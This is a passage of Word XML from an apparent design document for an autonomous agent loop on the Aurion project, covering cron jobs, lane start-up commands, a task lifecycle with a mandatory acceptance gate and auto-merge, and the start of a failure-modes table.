              <w:t>Read-only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5184"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/monitor-tick</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> issue triage; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/diagnose-ci</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> correlation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="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Production safety:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Only aws-dev profile is exposed. Prod credentials never get an MCP. The 'dev only' Terraform constraint is mechanical — the bot cannot reach prod even if it tried.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>13. Cron + the driver loop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Crons</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Monitor — every 30 min, 06:00-22:00 weekdays</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>*/30 6-22 * * 1-5  claude /monitor-tick</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Daily digest — 18:00 weekdays</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0 18 * * 1-5       claude /daily-digest</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Disk hygiene — Sunday 02:00</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0 2 * * 0          docker system prune -f &amp;&amp; find ~/Library/Developer/Xcode/DerivedData -mtime +7 -delete</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Single-lane start (begin here)</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cd ~/Documents/GitHub/Aurion</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>claude /loop "drive the Aurion MVP backlog autonomously per .claude/state/backlog.md.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Lane: backend.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Authority boundaries in memory/autonomous_authority.md.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Tick = one task end-to-end (plan → implement → verify → simplify → PR → CI → auto-merge → pick next)."</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Two-lane start (after one lane has shipped 2–3 PRs cleanly)</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Terminal 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cd ~/aurion-lanes/backend</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>claude /loop "Lane: backend. ..."</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Terminal 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cd ~/aurion-lanes/ios</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>claude /loop "Lane: ios. ..."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>14. Task lifecycle (one tick)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="200"/>
        <w:ind w:left="144" w:right="144"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F4F8"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="4" w:color="D0D5DE"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="D0D5DE"/>
          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="D0D5DE"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="D0D5DE"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. Read .claude/state/alerts.md → handle any new alerts FIRST</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. /next-task (lane-filtered)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    → pop top Active item, move to In flight; write in-flight.json</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. /plan-task (Plan subagent)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    → mandatory AC + security implications + executable test plan</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. Create feature branch: lane-{backend|ios}/{task-id}-{slug}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    → commit plan as 'docs: plan for {task-id}'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5. Post plan to Linear sub-issue</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6. /implement (delegates to @backend-builder or @ios-builder)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    → commit after each green test</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7. @test-writer adds tests that verify each AC</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8. @compliance-checker scans for PHI / descriptive-mode violations</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9. /verify-acceptance ← MANDATORY GATE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    9a. backend tests green</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    9b. iPhone 17 build green</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    9c. iPad Pro 11" build green</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    9d. docker compose up + /health 200</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    9e. each AC verified</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    9f. /simplify produces no P1 findings</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    fail? → loop back to step 6 with failure context, max 3 attempts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>10. /open-pr → fills template, ticks security checkboxes it can prove</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>11. /await-ci → ScheduleWakeup 5 min, poll gh pr checks</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    green AND all checkboxes ticked → step 12</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    red → /diagnose-ci</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>12. /auto-merge → squash + delete branch; move Active → Done</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>13. /next-task → step 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>15. Failure modes</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B3E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5904"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B3E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>What the loop does</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Plan missing AC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5904"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Re-invoke Plan subagent with explicit feedback. Max 2 retries → alert.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>AC verification fails</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5904"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Loop back to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
